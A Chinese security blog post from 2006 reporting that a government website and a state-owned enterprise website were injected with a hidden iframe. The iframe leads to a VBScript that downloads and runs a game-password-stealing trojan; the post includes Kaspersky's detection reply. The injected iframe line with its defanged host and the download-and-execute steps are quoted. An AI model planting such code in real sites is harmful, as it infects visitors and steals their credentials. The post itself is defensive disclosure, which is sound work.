[10-01]某政府和某中央企业网站被挂的木马升级了(第2版)
2006-09-30 18:05
393 查看
endurer 原创
2006-10-01 第2版 补充 Kaspersky的回复。
2006-09-30 第1版
上回发现这两个网站被挂上魔兽网游盗号木马。
如今网站首页被加入的代码变为:
/------------
<iframe height=0 width=0 src="hxxp://***object***.cnicb*.com/1**5"></iframe>
------------/
hxxp://***object***.cnicb*.com/1**5 的内容为加入多余空格的VBScript脚本代码。
该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object**.cnicb*.com/1***5/s***.exe,保存为 %temp%/test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
test.exe 长度为 58,412 字节。
Hello, thank you, detected as Trojan-PSW.Win32.OnLineGames.m
Detection will be added to the next update.
--
Best regards, Shvetsov Dmitry
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/
2006-10-01 第2版 补充 Kaspersky的回复。
2006-09-30 第1版
上回发现这两个网站被挂上魔兽网游盗号木马。
如今网站首页被加入的代码变为:
/------------
<iframe height=0 width=0 src="hxxp://***object***.cnicb*.com/1**5"></iframe>
------------/
hxxp://***object***.cnicb*.com/1**5 的内容为加入多余空格的VBScript脚本代码。
该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object**.cnicb*.com/1***5/s***.exe,保存为 %temp%/test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
test.exe 长度为 58,412 字节。
主 题: | RE: test.exe [KLAB-1256458] | |
发件人: | "" <newvirus@kaspersky.com> | 发送时间:2006-09-30 20:52:16 |
收件人: | "" <endurer@163.com> |
Detection will be added to the next update.
--
Best regards, Shvetsov Dmitry
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/
相关文章推荐
- 某政府网站和某中央企业的网站被挂魔兽网游盗号木马(第2版)
- [09-06] 又一个下载木马的网站(第2版)
- 据调查 企业半年之后才考虑升级到Windows 10企业版
- PageAdmin企业网站系统—政府及大中型企业网站建设的利器
- 一个被挂木马的政府网站
- 企业网站不设防轻松入侵传木马
- PageAdmin企业网站系统——政府及大中型企业网站建设的利器
- 一个被挂上木马Trojan-Dropper.MSWord.Lafool.i的政府网站
- [2006-04-12]一个下载传奇盗号木马的网站(第2版)
- 企业IT管理员IE11升级指南【10】—— 如何阻止IE11的安装
- Jenkins持续集成企业实战系列之两种网站部署的流程-----01
- 又一个被挂木马的政府网站(第3版)
- 升级Windows 10正式版后能降级吗?企业用户一个月内可以降级
- 01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
- SFB 项目经验-51-某上市企业2千人Exchange 2013升级2016高可用之伤01
- 耐思尼克优惠升级:注册域名送企业网站
- 夺命雷公狗ThinkPHP项目之----企业网站10之栏目的编辑完善(无限极分类的完成)
- 如何把企业邮箱的登陆框应用的自己网站的主页
- 分支程序设计01 - 零基础入门学习C语言10